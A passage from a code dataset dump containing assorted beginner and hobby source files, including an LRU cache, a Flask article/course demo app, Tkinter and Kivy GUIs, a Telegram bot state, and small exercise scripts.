item.\n\nFollow up:\nCould you do both operations in O(1) time complexity?\n\nExample:\n\nLRUCache cache = new LRUCache( 2 /* capacity */ );\n\ncache.put(1, 1);\ncache.put(2, 2);\ncache.get(1); // returns 1\ncache.put(3, 3); // evicts key 2\ncache.get(2); // returns -1 (not found)\ncache.put(4, 4); // evicts key 1\ncache.get(1); // returns -1 (not found)\ncache.get(3); // returns 3\ncache.get(4); // returns 4\n'''\nclass DLinkedNode:\n def __init__(self, key=-1, val=-1):\n self.key = key\n self.val = val\n self.prev = None\n self.next = None\n\nclass LRUCache:\n\n def __init__(self, capacity):\n \"\"\"\n :type capacity: int\n \"\"\"\n self.capacity = capacity\n self.cache = dict()\n self.head, self.tail = DLinkedNode(), DLinkedNode()\n self.head.next = self.tail\n self.tail.prev = self.head\n\n def get(self, key):\n \"\"\"\n :type key: int\n :rtype: int\n \"\"\"\n if key not in self.cache: return -1\n node = self.cache[key]\n self.__remove_node(node)\n self.__add_node(node)\n return node.val\n\n def put(self, key, value):\n \"\"\"\n :type key: int\n :type value: int\n :rtype: void\n \"\"\"\n if key in self.cache:\n node = self.cache[key]\n node.val = value\n self.__remove_node(node)\n else:\n if len(self.cache) == self.capacity:\n self.cache.pop(self.tail.prev.key)\n self.__remove_node(self.tail.prev)\n node = DLinkedNode(key, value)\n self.cache[key] = node\n self.__add_node(node)\n\n def __remove_node(self, node):\n node.prev.next = node.next\n node.next.prev = node.prev\n\n def __add_node(self, node):\n node.next = self.head.next\n self.head.next.prev = node\n self.head.next = node\n node.prev = self.head\n\ncache = LRUCache(2)\ncache.put(1, 1)\ncache.put(2, 2)\nprint(cache.get(1)) # returns 1\ncache.put(3, 3) # evicts key 2\nprint(cache.get(2)) # returns -1 (not found)\ncache.put(4, 4) # evicts key 1\nprint(cache.get(1)) # returns -1 (not found)\nprint(cache.get(3)) # returns 3\nprint(cache.get(4)) # returns 4\n","sub_path":"leetcode/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"164541157","text":"from telegram import Update, ReplyKeyboardMarkup\r\nfrom telegram.ext import MessageHandler, Filters, CallbackContext\r\n\r\nfrom bot.resources import keyboards, messages\r\nfrom bot.states import names\r\nfrom bot.states.common import back\r\nfrom extensions import State\r\n\r\n\r\ndef activator(update: Update, context: CallbackContext):\r\n reply_markup = ReplyKeyboardMarkup(keyboards.YES_NO, resize_keyboard=True)\r\n update.message.reply_text(messages.MSG_FOR_ALL.format(context.chat_data['current_message']),\r\n reply_markup=reply_markup)\r\n\r\n\r\ndef yes(update: Update, context: CallbackContext):\r\n # Отправляем сообщение пользователям\r\n return names.HELLO_HABIT_MENU\r\n\r\ndef no(update: Update, context: CallbackContext):\r\n # Отправляем сообщение пользователям\r\n return names.HELLO_HABIT_MENU\r\n\r\n\r\nmessage_send_state = State(\r\n on_activate=activator,\r\n handlers=[\r\n MessageHandler(Filters.regex(f'({keyboards.BACK_BUTTON})'), back),\r\n MessageHandler(Filters.regex(f'({keyboards.YES_BUTTON})'), yes),\r\n MessageHandler(Filters.regex(f'({keyboards.NO_BUTTON})'), no),\r\n ]\r\n)\r\n","sub_path":"bot/states/message/message_send.py","file_name":"message_send.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"512571212","text":"num = int(input('Digite um numero inteiro: '))\r\nprint('''Escolha uma das bases para conversão:\r\n[1] converter para binário\r\n[2] converter para octal\r\n[3] converter para hexadecimal''')\r\nopcao = int(input('Sua opção: '))\r\n\r\nif opcao ==1:\r\n print(bin(num)[2:])\r\nelif opcao==2:\r\n print(oct(num)[2:])\r\nelif opcao==3:\r\n print(hex(num)[2:])\r\nelse:\r\n print('Opção inexistente!!!')\r\n\r\n","sub_path":"ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"365194597","text":"# -*- coding:utf-8 -*-\n\nfrom flask import Flask, render_template\n# template for display\nfrom flask import request, flash, url_for, redirect\n# lib for login\n\nfrom article import Article\nfrom course import Course\n# import class for articles, courses\n\nfrom flask_modus import Modus\n# handle patch delete request\n\napp = Flask(__name__)\nmodus = Modus(app)\n# method overwriting\n\n\napp.secret_key = b'development key'\n\narticle_list = [Article('Sample_Name', 'Sample_Essay')]\ncourse_list = [Course('Sample_Course', 'Sample_Name', '24')]\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n if request.form['username'] == u'北京林业大学':\n if request.form['password'] == u'123456':\n # return u\"欢迎您\" + request.form['username']\n flash('You were successfully logged in')\n return redirect(url_for('index'))\n else:\n return request.form['username'] + u'密码不正确'\n else:\n return u'该用户不存在:'+ request.form['username']\n else:\n return u'HTTP方法不正确'\n\n\n@app.route(\"/articles\", methods=['GET', 'POST'])\ndef articles():\n if request.method == 'POST':\n new_article = Article(request.form['author'], request.form['content'])\n article_list.append(new_article)\n return redirect(url_for('articles'))\n return render_template('articles.html', articles=article_list)\n\n@app.route(\"/articles/new\")\ndef add_article():\n return render_template('add_article.html')\n\n@app.route('/articles/', methods=['GET', 'PATCH', 'DELETE'])\ndef show_article(id):\n found_article = [art for art in article_list if art.id == id][0]\n # use r'METHOD' if patch request were not handled correctly\n if request.method == 'PATCH':\n found_article.author = request.form['author']\n found_article.content = request.form['content']\n return redirect(url_for('articles'))\n if request.method == 'DELETE':\n article_list.remove(found_article)\n return redirect(url_for('articles'))\n return render_template('show_article.html', article=found_article)\n\n@app.route('/articles//edit')\ndef edit_article(id):\n found_article = [art for art in article_list if art.id == id][0]\n return render_template('edit_article.html', article=found_article)\n\n@app.route(\"/form\")\ndef form():\n return render_template('form.html')\n\n@app.route('/courses', methods=['GET', 'POST'])\ndef courses():\n if request.method == 'POST':\n new_course = Course(request.form['name'], request.form['teacher'], request.form['duration'])\n course_list.append(new_course)\n return redirect(url_for('courses'))\n return render_template('courses.html', courses=course_list)\n\n@app.route('/courses/new')\ndef add_course():\n return render_template('add_course.html') \n\n@app.route('/courses/', methods=['GET', 'DELETE', 'PATCH'])\ndef edit_course(id):\n found_course = [cor for cor in course_list if cor.id == id][0]\n if request.method == 'DELETE':\n course_list.remove(found_course)\n return redirect(url_for('courses'))\n if request.method == 'PATCH':\n found_course.name = request.form['name']\n found_course.teacher = request.form['teacher']\n found_course.duration = request.form['duration']\n return redirect(url_for('courses'))\n return render_template('edit_course.html', course=found_course)\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='127.0.0.1', port='3000')","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"475235469","text":"import tkinter as tk\nimport data\n\nclass gui():\n def __init__(self):\n#setup window\n self.root = tk.Tk()\n self.root.title(\"集成曲谱曲牌检索 v1.0\")\n self.root.configure(bg=\"#f3df99\")\n X = int(self.root.winfo_screenwidth())-800\n Y = int(self.root.winfo_screenheight())-600\n self.root.minsize(785,520)\n self.root.geometry(\"785x520+%d+%d\" % (X/2 , Y/2))\n#title frame\n self.titleframe=tk.Frame(self.root)\n self.titleframe.grid(row=0,column=0,columnspan=8,sticky=\"W\",padx=60)\n self.titleframe.config(bg=\"#f3df99\")\n\n self.labelA=tk.Label(self.titleframe,text=\"集成曲谱曲牌检索\",font=(\"ss\",\"13\",\"bold\"))\n self.labelA.grid(row=0,column=0,columnspan=4,pady=20)\n self.labelA.configure(background=\"#f3df99\")\n self.labelB=tk.Label(self.titleframe,text=\"根据《螾庐曲谈·卷三》整理录入 by 乱煞年光遍\")\n self.labelB.configure(background=\"#f3df99\")\n self.labelB.grid(row=1,column=1,columnspan=5,padx=40)\n\n#search frame\n self.searchframe=tk.Frame(self.root)\n self.searchframe.grid(row=1,column=0,pady=15,columnspan=8,padx=10)\n self.searchframe.config(bg=\"#f3df99\")\n \n self.label1=tk.Label(self.searchframe,text=\"宫调\",width=12)\n self.label1.configure(background=\"#f3df99\")\n self.label1.grid(row=3,column=1)\n self.label2=tk.Label(self.searchframe,text=\"性质\",width=12)\n self.label2.configure(background=\"#f3df99\")\n self.label2.grid(row=3,column=2)\n self.label3=tk.Label(self.searchframe,text=\"曲牌\",width=12)\n self.label3.configure(background=\"#f3df99\")\n self.label3.grid(row=3,column=3)\n self.label3=tk.Label(self.searchframe,text=\"剧目\",width=12)\n self.label3.configure(background=\"#f3df99\")\n self.label3.grid(row=3,column=4)\n self.label4=tk.Label(self.searchframe,text=\"折子\",width=12)\n self.label4.configure(background=\"#f3df99\")\n self.label4.grid(row=3,column=5)\n self.label5=tk.Label(self.searchframe,text=\"位置\",width=12)\n self.label5.configure(background=\"#f3df99\")\n self.label5.grid(row=3,column=6)\n \n self.entry1=tk.Entry(self.searchframe,width=10)\n self.entry1.grid(row=4,column=1)\n self.entry2=tk.Entry(self.searchframe,width=10)\n self.entry2.grid(row=4,column=2)\n self.entry3=tk.Entry(self.searchframe,width=10)\n self.entry3.grid(row=4,column=3)\n self.entry4=tk.Entry(self.searchframe,width=10)\n self.entry4.grid(row=4,column=4)\n self.entry5=tk.Entry(self.searchframe,width=10)\n self.entry5.grid(row=4,column=5)\n self.entry6=tk.Entry(self.searchframe,width=10)\n self.entry6.grid(row=4,column=6)\n#searchbutton\n self.button=tk.Button(self.searchframe,text=\" 搜  索 \",width=8,command=lambda: self.searchdata(self.entry1.get(),self.entry2.get(),self.entry3.get(),self.entry4.get(),self.entry5.get(),self.entry6.get()))\n self.button.config(bg=\"#814713\",fg=\"white\")\n self.button.grid(row=3,column=7,sticky=\"W\"+\"S\",rowspan=2,padx=25)\n \n#example frame\n self.exframe=tk.Frame(self.root)\n self.exframe.grid(row=2,column=0,columnspan=20,pady=40,padx=34,rowspan=9)\n self.exframe.config(bg=\"#f3df99\")\n \n self.flabel00=tk.Label(self.exframe,text=\"示例\",font=(\"ss\",\"11\",\"bold\"),width=15)\n self.flabel00.configure(bg=\"#f3df99\")\n self.flabel00.grid(row=0,column=0,sticky=\"W\")\n self.flabel0=tk.Label(self.exframe,text=\"序号\t宫调\t性质\t曲牌\t剧目\t折子\t位置\",width=58)\n self.flabel0.configure(bg=\"#f3df99\")\n self.flabel0.grid(row=1,column=0,sticky=\"W\",pady=5)\n self.flabel1=tk.Label(self.exframe,text=\"0010\t仙吕宫\t南引子\t番卜算\t燕子笺\t拾笺\t振五\",width=58)\n self.flabel1.configure(bg=\"#f3df99\")\n self.flabel1.grid(row=2,column=0,sticky=\"W\")\n self.flabel1=tk.Label(self.exframe,text=\"0044\t仙吕宫\t南过曲\t月儿高\t白罗衫\t游园\t振八\",width=58)\n self.flabel1.configure(bg=\"#f3df99\")\n self.flabel1.grid(row=3,column=0,sticky=\"W\")\n self.flabel1=tk.Label(self.exframe,text=\"0061\t仙吕宫\t南过曲\t醉扶归\t牡丹亭\t游园\t声四\",width=58)\n self.flabel1.configure(bg=\"#f3df99\")\n self.flabel1.grid(row=4,column=0,sticky=\"W\")\n self.flabel3=tk.Label(self.exframe,text=\"0372\t南吕宫\t南过曲\t一江风\t西楼记\t拆书\t金六\",width=58)\n self.flabel3.configure(bg=\"#f3df99\")\n self.flabel3.grid(row=5,column=0,sticky=\"W\") \n self.flabel4=tk.Label(self.exframe,text=\"0373\t南吕宫\t南过曲\t一江风\t荆钗记\t绣房\t声二\",width=58)\n self.flabel4.configure(bg=\"#f3df99\")\n self.flabel4.grid(row=6,column=0,sticky=\"W\")\n self.flabel5=tk.Label(self.exframe,text=\"0500\t南吕宫\t南集曲\t罗江怨\t西楼记\t楼会\t金六\",width=58)\n self.flabel5.configure(bg=\"#f3df99\")\n self.flabel5.grid(row=7,column=0,sticky=\"W\")\n self.flabel5=tk.Label(self.exframe,text=\"0534\t南吕宫\t北曲\t乌夜啼\t铁冠图\t守门\t玉六\",width=58)\n self.flabel5.configure(bg=\"#f3df99\")\n self.flabel5.grid(row=8,column=0,sticky=\"W\")\n#picture\n photo=tk.PhotoImage(file=\"pic.asd\")\n self.labelp=tk.Label(self.exframe,image=photo)\n self.labelp.image = photo\n self.labelp.configure(background=\"#f3df99\")\n self.labelp.grid(row=0,column=1,sticky=\"N\"+\"W\",pady=10,rowspan=50,padx=20)\n\n\n def MainLoop(self):\n self.root.mainloop()\n\n\n def searchdata(self,a,b,c,d,e,f):\n self.clear()\n a=str(a)\n b=str(b)\n c=str(c)\n d=str(d)\n e=str(e)\n f=str(f)\n#textframe\n self.textframe=tk.Frame(self.root)\n self.textframe.grid(row=2,column=0,rowspan=20,columnspan=20,padx=45)\n self.textframe.configure(bg=\"#f3df99\")\n \n self.text=tk.Text(self.textframe,width=57,height=25)\n self.text.grid(row=1,column=0,columnspan=8)\n self.scrollbar=tk.Scrollbar(self.textframe)\n self.scrollbar.grid(row=1,column=8,sticky=\"N\"+\"S\")\n self.scrollbar.config(command=self.text.yview,troughcolor=\"#814713\")\n self.text.config(yscrollcommand=self.scrollbar.set,bg=\"#f3e7bf\")\n self.labelaa=tk.Label(self.textframe,text=\"序 号\")\n self.labelaa.grid(row=0,column=0,sticky=\"W\")\n self.labelaa.config(bg=\"#f3df99\")\n self.labela=tk.Label(self.textframe,text=\" 宫 调\")\n self.labela.grid(row=0,column=1,sticky=\"W\")\n self.labela.config(bg=\"#f3df99\")\n self.labelb=tk.Label(self.textframe,text=\"性 质\")\n self.labelb.grid(row=0,column=2,sticky=\"W\")\n self.labelb.config(bg=\"#f3df99\")\n self.labelc=tk.Label(self.textframe,text=\" 曲 牌\")\n self.labelc.grid(row=0,column=3,sticky=\"W\")\n self.labelc.config(bg=\"#f3df99\")\n self.labele=tk.Label(self.textframe,text=\"剧 目\")\n self.labele.grid(row=0,column=4,sticky=\"W\")\n self.labele.config(bg=\"#f3df99\")\n self.labeld=tk.Label(self.textframe,text=\"折子 \")\n self.labeld.grid(row=0,column=5,sticky=\"W\")\n self.labeld.config(bg=\"#f3df99\")\n self.labele=tk.Label(self.textframe,text=\"位置\")\n self.labele.grid(row=0,column=6,sticky=\"W\")\n self.labele.config(bg=\"#f3df99\")\n#picture\n photo=tk.PhotoImage(file=\"pic.asd\")\n self.labelp=tk.Label(self.textframe,image=photo)\n self.labelp.image = photo\n self.labelp.configure(background=\"#f3df99\")\n self.labelp.grid(row=0,column=9,sticky=\"N\"+\"W\",pady=50,rowspan=10,padx=1)\n \n\n search_dic=data.datas()\n result=search_dic.final(a,b,c,d,e,f)\n for ele in result:\n for item in ele[1]:\n item=item+\"\\t\"\n self.text.insert(tk.END,item)\n self.text.insert(tk.END,\"\\n\")\n self.text.config(state=\"disabled\")\n\n \n \n def clear(self):\n self.exframe.grid_remove()\n self.entry1.delete(0,tk.END)\n self.entry2.delete(0,tk.END)\n self.entry3.delete(0,tk.END)\n self.entry4.delete(0,tk.END)\n self.entry5.delete(0,tk.END)\n self.entry6.delete(0,tk.END)\n","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"607994826","text":"#!/usr/bin/env python\r\n\r\nimport os\r\n\r\nfrom kivy.metrics import dp\r\nfrom kivy.uix.floatlayout import FloatLayout\r\nfrom kivy.uix.gridlayout import GridLayout\r\nfrom kivy.uix.image import Image\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelHeader\r\n\r\nfrom amgineirc.view.settings.settingsView import SettingsView\r\nfrom amgineirc.view.channels.connectionsView import ConnectionsView\r\nfrom amgineirc.viewModel.appViewModel import AppViewModel\r\n\r\nclass AppView(FloatLayout):\r\n connected_string = 'Connected'\r\n not_connected_string = 'Not Connected'\r\n connected_fg = [0.0, 1.0, 0.0, 1.0] # green\r\n not_connected_fg = [1.0, 0.0, 0.0, 1.0] # red\r\n\r\n def __init__(self, appdata):\r\n FloatLayout.__init__(self, size_hint=(1.0, 1.0))\r\n # upper view\r\n self.upper_view = _AppUpperView(appdata,\r\n tab_height=dp(60),\r\n tab_width=dp(250),\r\n do_default_tab=True,\r\n default_tab_text='AmgineIRC',\r\n default_tab_content = self._build_about_app_content(appdata),\r\n size_hint=(1.0, 0.9),\r\n pos_hint={'x':0.0, 'y':0.1})\r\n self.add_widget(self.upper_view)\r\n # lower view\r\n self._lower_view = _AppLowerView(appdata,\r\n size_hint=(1.0, 0.1),\r\n pos_hint={'x':0.0, 'y':0.0})\r\n self.add_widget(self._lower_view)\r\n self.set_status_bar(False)\r\n AppViewModel(self, appdata)\r\n\r\n def _build_about_app_content(self, appdata):\r\n # image\r\n src = os.path.join(appdata['app'].directory, 'amgineirc_IRC_dessert.png')\r\n image = Image(source=src)\r\n # text (name and version)\r\n label = Label(text='', markup=True)\r\n sizei = label.font_size * 2\r\n sizes = '[size=%i]' % (sizei)\r\n letters = [sizes,\r\n '[color=b08c62]A[/color]',\r\n '[color=b08c62]m[/color]',\r\n '[color=b08c62]g[/color]',\r\n '[color=b08c62]i[/color]',\r\n '[color=b08c62]n[/color]',\r\n '[color=b08c62]e[/color]',\r\n '[color=82c477]I[/color]',\r\n '[color=82c477]R[/color]',\r\n '[color=82c477]C[/color]',\r\n '[/size]']\r\n name = ''.join(letters)\r\n version = 'Version %i.%i.%i' % (appdata['version']['major'],\r\n appdata['version']['minor'],\r\n appdata['version']['bugfix'])\r\n text = '%s %s' % (name, version)\r\n label.text = text\r\n layout = GridLayout(cols=1, padding=20)\r\n layout.add_widget(image)\r\n layout.add_widget(label)\r\n return layout\r\n \r\n\r\n def set_status_bar(self, connected):\r\n if connected == True:\r\n self._lower_view.text=AppView.connected_string\r\n self._lower_view.color=AppView.connected_fg\r\n else:\r\n self._lower_view.text=AppView.not_connected_string\r\n self._lower_view.color=AppView.not_connected_fg\r\n\r\nclass _AppLowerView(Label):\r\n def __init__(self, appdata, **kargs):\r\n kargs['text'] = u''\r\n Label.__init__(self, **kargs)\r\n\r\n\r\nclass _AppUpperView(TabbedPanel):\r\n \"\"\"this class does not have a view model\r\n its pages have their own view models\r\n \"\"\"\r\n\r\n settings_page_label = 'Configuration'\r\n connections_page_label = 'Connections'\r\n\r\n def __init__(self, appdata, **kargs):\r\n TabbedPanel.__init__(self, **kargs)\r\n # add the settings tab\r\n self._settings_th = TabbedPanelHeader(text=_AppUpperView.settings_page_label)\r\n self._settings_th.content = SettingsView(appdata,\r\n tab_width=dp(200))\r\n self.add_widget(self._settings_th)\r\n # add the connections tab\r\n self._connections_th = TabbedPanelHeader(text=_AppUpperView.connections_page_label)\r\n self.connections_view = ConnectionsView(appdata,\r\n tab_height=40,\r\n tab_width=200)\r\n self._connections_th.content = self.connections_view\r\n self.add_widget(self._connections_th)\r\n\r\n def raise_connections_page(self):\r\n self.switch_to(self._connections_th)\r\n","sub_path":"windows/amgineirc/view/appView.py","file_name":"appView.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"381954921","text":"from django.urls import include, path\n\nfrom .views import ProfileRetrieveAPIView, ProfileFollowAPIView, \\\n FollowersAPIView, FollowingAPIView, ProfileList\n\napp_name = 'profiles'\nurlpatterns = [\n path('', ProfileRetrieveAPIView.as_view()),\n path('', ProfileList.as_view()),\n path('/follow', ProfileFollowAPIView.as_view()),\n path('/following', FollowingAPIView.as_view()),\n path('/followers', FollowersAPIView.as_view()),\n] ","sub_path":"authors/apps/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"449710274","text":"\nimport com.ihsan.foundation.pobjecthelper as phelper\nimport time, sys, os\nimport PIL.Image as Image\n\ndef formSetDataEx(UIDefList, Parameter):\n if Parameter.DatasetCount == 0: return\n config = UIDefList.config\n helper = phelper.PObjectHelper(config)\n par = Parameter.FirstRecord\n key = par.Key\n UIDefList.SetData('uiEmp', key)\n EmpId = key.split('=')[1]\n config = UIDefList.config\n helper = phelper.PObjectHelper(config)\n Employ = helper.GetObject('Employee',EmpId)\n\n recE = UIDefList.uiEmp.Dataset.GetRecord(0)\n recE.PositionId = Employ.LWorkUnitPosition.LPosition.Description\n recE.WorkUnitId = Employ.LWorkUnitPosition.LWorkUnit.Description\n\n individu='PObj:INDIVIDU#INDIVIDUID=%d' % (Employ.IndividuId)\n UIDefList.SetData('uipart', individu)\n\n FE = UIDefList.GetPClassUIByName('uiFormal')\n sSQL = \"select * from education a, formaleducation b \"\n sSQL +=\"where a.educationid=b.educationid and a.individuid=%s \" % Employ.IndividuId\n res = config.CreateSQL(sSQL).RawResult\n res.First()\n while not res.Eof:\n recItem = FE.Dataset.AddRecord()\n recItem.EduYear = res.EduYear\n recItem.EduInstitution = res.EduInstitution\n recItem.EducationName = res.EducationName\n recItem.Alamat = res.Alamat\n recItem.Nilai = res.Nilai\n recItem.Description = res.Description\n recItem.Fakultas = res.Fakultas\n recItem.Jurusan = res.Jurusan\n res.Next()\n\n NFE = UIDefList.GetPClassUIByName('uiNonformal')\n sSQL = \"select * from education a, nonformaleducation b \"\n sSQL +=\"where a.educationid=b.educationid and a.individuid=%s \" % Employ.IndividuId\n res = config.CreateSQL(sSQL).RawResult\n res.First()\n while not res.Eof:\n recItem = NFE.Dataset.AddRecord()\n recItem.EduYear = res.EduYear\n recItem.EduInstitution = res.EduInstitution\n recItem.EducationName = res.EducationName\n recItem.Alamat = res.Alamat\n recItem.Description = res.Description\n res.Next()\n\n TS = UIDefList.GetPClassUIByName('uiTraining')\n sSQL = \"select * from training a, trainingseminar b \"\n sSQL +=\"where a.trainingid=b.trainingid and a.individuid=%s \" % Employ.IndividuId\n res = config.CreateSQL(sSQL).RawResult\n res.First()\n while not res.Eof:\n recItem = TS.Dataset.AddRecord()\n recItem.Year = res.Year\n recItem.Institution = res.Institution\n recItem.Materi = res.Materi\n recItem.Status = res.Status\n res.Next()\n\ndef OnSetData(sender):\n config =sender.UIDefList.config\n Data = sender.ActiveRecord\n Data.JamDatang = config.FormatDateTime('hh:mm:ss',Data.ArriveTime)\n Data.JamPulang = config.FormatDateTime('hh:mm:ss',Data.ReturnTime)\n\ndef GetImg(config, parameter, returnpacket):\n imgdir = config.GetGlobalSetting('IMAGEHOMEDIR')\n foto1 = parameter.FirstRecord.foto1\n foto2 = parameter.FirstRecord.foto2\n foto3 = parameter.FirstRecord.foto3\n #raise '',foto1\n if foto1 not in [None,'',0]:\n sw = returnpacket.AddStreamWrapper()\n sw.Name = foto1\n sw.LoadFromFile(imgdir+\"\\\\Profil\\\\\"+foto1)\n if foto2 not in [None,'',0]:\n sw = returnpacket.AddStreamWrapper()\n sw.Name = foto2\n sw.LoadFromFile(imgdir+\"\\\\Tanda Tangan\\\\\"+foto2)\n if foto3 not in [None,'',0]:\n sw = returnpacket.AddStreamWrapper()\n sw.Name = foto3\n sw.LoadFromFile(imgdir+\"\\\\Paraf\\\\\"+foto3)\n\ndef DLFile(config,parameters,returns):\n status = returns.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n ['StreamName',''],\n )\n file = parameters.FirstRecord.file\n jenis = parameters.FirstRecord.jenis\n helper = phelper.PObjectHelper(config)\n config.BeginTransaction()\n try:\n HomeDir = config.GetGlobalSetting('FILEHOMEDIR')\n FileTarget =HomeDir+ jenis +file\n\n sw = returns.AddStreamWrapper()\n sw.Name = 'TF'\n sw.LoadFromFile(FileTarget)\n #sw.MIMEType = config.AppObject.GetMIMETypeFromExtension(FileTarget)\n sw.MIMEType = 'applications/vnd.pdf'\n\n config.Commit()\n except:\n config.Rollback()\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n\n\n","sub_path":"dialogs/karyawan/fViewPersonalEmployee2_data.py","file_name":"fViewPersonalEmployee2_data.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"639903310","text":"# palindrome.py\n# This program reads strings from the\n# user and says which are palindromes#\n#\n# Prof Geitz/class/me\n# 15 February 2016\n\n\n\ndef Reverse(s):\n # This returns the reversal of string s\n rev = \"\"\n for letter in s:\n rev = letter + rev # rev + letter would give forwards!\n return rev # So we don't get \"none\" bug\n\ndef IsPalindrome(s):\n if s == Reverse(s):\n return True\n else:\n return False\n\ndef RemoveSpaces(s):\n # This returns a new string just like s but with no spaces\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n result = \"\"\n for char in s:\n if char in alphabet:\n # if char != \" \": <-- when we just regExed for spaces\n result = result+char\n return result\n\ndef main():\n done = False\n while not done:\n string = input( \"Give me a string: \")\n if string == \"\":\n done = True\n else:\n if IsPalindrome(RemoveSpaces(string.lower())):\n # Prints capital if \"Bob\" but checks on \"bob\"\n # and calls RemoveSpaces on lower alphabet ;)\n print( \"Yep, '%s' is a palindrome.\"%string )\n else:\n print( \"Not a palindrome.\" )\n\nmain()\n","sub_path":"Class/Lecture 7/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"209025589","text":"'''\n本程式利用AI幫忙製作Label文件並存於指定目錄\n增加人工Labeling的便利性與速度\n\ninput :檢測目標的目錄位置,圖片副檔名必須為.bmp\noutput:產生Label(.xml)與mask(.bmp)文件\n'''\n\n'''\nupdate issue:\n\n'''\n\n# ---python package---\nimport os\nimport cv2\nimport glob\nimport numpy as np\nimport shutil\n# ---自定義的類別---\nfrom make_xml import create_xml\nfrom Detector import CP_Detection\n\n# np.random.seed(1)\ndetect_path = \"D:/AOI/PMI_Project_dataset/total/image/\" + \"*.bmp\" # 需Labeling的圖片目錄位置\noutput_path = \"D:/AOI/Label/\" # 輸出結果位置\n\n# 判斷output_path所設定的位置是否存在,若存在則刪除\n# 並重新產生output_path目錄,在output_path目錄下產生\"mask\", \"xml\"資料夾\nif os.path.exists(output_path):\n shutil.rmtree(output_path)\nos.mkdir(output_path)\nfor f in [\"mask\", \"xml\"]:\n if not os.path.exists(os.path.join(output_path, f)):\n os.mkdir(os.path.join(output_path, f))\n\ndetector = CP_Detection(mode=\"ai\") # detector 使用AI model偵測,可使用denoise、inference、detect功能\n\nfile_list = list(glob.glob(detect_path))\n# index = np.random.randint(0, len(file_list), 10000)\nfile_list = np.array(file_list)\n# run_list = file_list[index]\nrun_list = file_list[:] # 以list方式找出所有測試影像的檔案位置\n\nfor file_name in run_list:\n image = cv2.imread(file_name) # 讀取圖片\n show_image = image.copy()\n\n process_image = show_image.copy()\n process_image = cv2.cvtColor(process_image, cv2.COLOR_BGR2GRAY) # BGR to Gray\n process_image = detector.denoise(process_image) # 抗雜訊\n\n pad_coordinates, pin_coordinate_list = detector.inference(process_image) # 偵測Pad(pad_coordinate)與針痕(pin_coordinate_list)\n\n # 繪製的Pad與針痕\n for b_coord in pad_coordinates:\n show_image = cv2.rectangle(show_image, tuple(b_coord[0:2]), tuple(b_coord[2:5]), (255, 0, 0), 1)\n\n for p_coord in pin_coordinate_list:\n show_image = cv2.rectangle(show_image, tuple(p_coord[0:2]), tuple(p_coord[2:5]), (0, 0, 255), 1)\n\n # 儲存繪製完成的圖片至目標目錄中的mask資料夾\n # 儲存Label資訊至xml資料夾\n create_xml(output_path + \"/xml\", os.path.basename(file_name), process_image.shape, pin_coordinate_list, pad_coordinates)\n cv2.imwrite(os.path.join(output_path, \"mask\", os.path.basename(file_name)), show_image)\n\n","sub_path":"make_dataset_by_ai.py","file_name":"make_dataset_by_ai.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"485502557","text":"# coding=utf-8\nfrom google.appengine.api.app_identity import get_default_version_hostname\nfrom google.appengine.ext.blobstore import BlobReader, BlobInfo, BlobKey\nfrom utils.blob_iterator import BlobIterator\nfrom utils.general import ResponseException\nfrom datetime import datetime\nimport webapp2\nimport logging\nimport json\nimport csv\n\n\nclass BaseService(webapp2.RequestHandler):\n\n def __init__(self, request, response):\n super(BaseService, self).__init__(request, response)\n self.start_time = datetime.today()\n self.result_string = ''\n self.debug = False\n self.resp = {}\n self.id = self.request.get('id')\n self.user_id = self.request.get('user_id')\n self.all = self.request.get('all')\n self.in_day = self.request.get('in_day')\n self.keys = None\n self.json = None\n if not hasattr(self, 'blobstore') or self.request.method == 'PUT':\n self.parse_json()\n self.log_name()\n self.set_debug()\n self.host = get_default_version_hostname()\n self.blob_info = None\n\n def log_name(self):\n if hasattr(self, 'service_name'):\n logging.info('%s.%s' % (self.service_name, self.request.method))\n else:\n logging.info('%s.%s' % (repr(self), self.request.method))\n\n def handle_exception(self, exception, model):\n logging.error({\"error\": str(exception.message)})\n self.response.status = 500\n\n if self.blob_info:\n logging.info('deleting blob: %s' % self.blob_info.filename)\n self.blob_info.delete()\n\n if isinstance(exception, ResponseException):\n self.response.out.write(json.dumps({\"error\": exception.message}))\n else:\n self.response.out.write(json.dumps({\"error\": 'server: %s' % exception.message}))\n\n def parse_json(self):\n\n if not self.request.method in ['PUT', 'POST']:\n return None\n\n try:\n body = self.request.body\n logging.info('body: %s' % body)\n self.json = json.loads(body)\n if isinstance(self.json, dict):\n self.keys = self.json.keys()\n if 'payload' in self.keys:\n self.payload = self.json['payload']\n\n except Exception as e:\n 